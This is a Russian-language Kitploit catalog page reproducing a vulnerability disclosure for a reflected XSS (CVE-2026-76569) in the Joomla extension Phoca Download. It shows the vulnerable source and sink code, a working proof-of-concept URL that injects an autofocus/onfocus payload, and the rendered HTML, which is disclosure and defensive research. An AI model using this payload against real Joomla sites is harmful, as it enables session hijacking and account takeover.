Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-76569 — Отражённый XSS через GET-параметр поиска в Phoca Download | Kitploit
Инструменты/GitHubGitHub/toanln-cov/cve-2026-76569
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubtoanln-cov/cve-2026-76569

CVE-2026-76569

Отражённый XSS через GET-параметр поиска в Phoca Download

Репозиторий
17 ч 11 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Отражённый XSS через GET-параметр search в Phoca Download

Phoca Download ≤ 6.1.4 — аутентифицированный злоумышленник выполняет произвольный JavaScript через специально сформированный поисковый URL в панели управления пользователя

CVE CVSS v4.0 CWE-79 Affected Researcher


КРАТКОЕ ОПИСАНИЕ

Phoca Download (com_phocadownload) для Joomla содержит уязвимость отражённого межсайтового скриптинга (XSS) в функциональности поиска файлов в панели управления пользователя. GET-параметр search обрабатывается с помощью фильтра 'string' Joomla — который вызывает только и сохраняет символ — а затем выводится без в HTML-атрибут . Злоумышленник может внедрить произвольные HTML-атрибуты и обработчики событий, которые выполняются в браузере жертвы при загрузке страницы, без необходимости какого-либо взаимодействия с пользователем, кроме перехода по специально сформированной ссылке.

strip_tags()
"
htmlspecialchars()
<input value="">

ЗАТРОНУТЫЕ ВЕРСИИ

КОМПОНЕНТУЯЗВИМАЯ ВЕРСИЯПРОТЕСТИРОВАНО НАИСПРАВЛЕНО
com_phocadownload≤ 6.1.4Joomla 5 + PhocaDownload 6.1.4 + MariaDB 10.66.1.5

ДЕТАЛИ УЯЗВИМОСТИ

Тип: Отражённый межсайтовый скриптинг (CWE-79) Требуется аутентификация: Зарегистрированный пользователь Joomla (вошедший в систему) + включённая панель управления пользователя (enable_user_cp = 1) Требуется CSRF-токен: Не требуется — GET-запрос, CSRF-токен на этом пути не проверяется Файл-приёмник: site/views/user/tmpl/default_files_bootstrap.php

Корневая причина

Параметр search считывается с помощью фильтра 'string' Joomla, который вызывает только strip_tags(). Это сохраняет символ ", позволяя злоумышленнику выйти из контекста атрибута value="" и внедрить произвольные HTML-атрибуты.

SITE/VIEWS/USER/VIEW.HTML.PHP:252 — ИСТОЧНИК

root@kitploit:~
$search_files = $app->getUserStateFromRequest(
    $this->_context_files.'.search', 'search', '', 'string'
);
$search_files = StringHelper::strtolower($search_files);
$lists_files['search'] = $search_files;  // сохраняется без кодирования

SITE/VIEWS/USER/TMPL/DEFAULT_FILES_BOOTSTRAP.PHP:56 — ПРИЁМНИК (УЯЗВИМЫЙ)

root@kitploit:~
<input type="text" name="search" id="pdsearch"
    value="<?php echo $this->t['listsfiles']['search'];?>"
    class="form-control" />

Соседнее представление phocadownloadlinkfile (то же расширение) корректно применяет PhocaDownloadUtils::filterValue($search, 'text') — эквивалент htmlspecialchars() — для того же поля поиска. Представление user не применяет ту же защиту, что указывает на непоследовательное кодирование вывода в рамках расширения.


ПОДТВЕРЖДЕНИЕ КОНЦЕПЦИИ

1. Войдите как зарегистрированный пользователь

Перейдите на страницу входа в Joomla и пройдите аутентификацию как зарегистрированный пользователь. После успешного входа Joomla перенаправит на страницу профиля пользователя, подтверждая активную сессию.

Успешный вход как testuser — перенаправление на страницу профиля

2. Откройте панель управления пользователя (базовое состояние)

Перейдите в панель управления пользователя PhocaDownload:

root@kitploit:~
http://TARGET/index.php?option=com_phocadownload&view=user

Страница отображается с пустым полем поиска (value=""). Это нормальное состояние до внедрения.

Панель управления пользователя — пустое поле поиска, базовое состояние

3. Отправьте специально сформированный URL с XSS-пейлоадом

Перейдите по следующему специально сформированному URL (или введите необработанный пейлоад непосредственно в поле поиска):

root@kitploit:~
http://TARGET/index.php?option=com_phocadownload&view=user&search=%22%20autofocus%20onfocus%3Dalert%28document.domain%29%20x%3D

Специально сформированный URL с XSS-пейлоадом, отправленный в параметр search

При загрузке страницы внедрённый атрибут autofocus фокусирует элемент ввода, немедленно запуская обработчик события onfocus. Дальнейшее взаимодействие с пользователем не требуется.

Отображаемый HTML (уязвимый):

root@kitploit:~
<input type="text" name="search" id="pdsearch"
  value="" autofocus onfocus=alert(document.domain) x="
  class="form-control" />

ВОЗДЕЙСТВИЕ

  1. Перехват сессии — Злоумышленник может похитить cookie сессии Joomla жертвы через document.cookie, что позволяет полностью захватить учётную запись без учётных данных.
  2. Выполнение произвольного JavaScript — Любой JavaScript выполняется в сессии браузера жертвы — возможны кейлоггинг, манипуляции с DOM, сбор учётных данных и перенаправление на фишинговые страницы.
  3. Повышение привилегий — Если администратор перейдёт по специально сформированной ссылке, будучи аутентифицированным, злоумышленник получит выполнение JavaScript с правами администратора, что потенциально позволит полностью скомпрометировать сайт через действия в административной панели.

ССЫЛКИ

  • CVE: https://www.cve.org/CVERecord?id=CVE-2026-76569
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-76569
  • GitHub Advisory: https://github.com/advisories/GHSA-99wr-9r6w-w242
  • Репозиторий разработчика: https://github.com/PhocaDesign/PhocaDownload
Скачать инструмент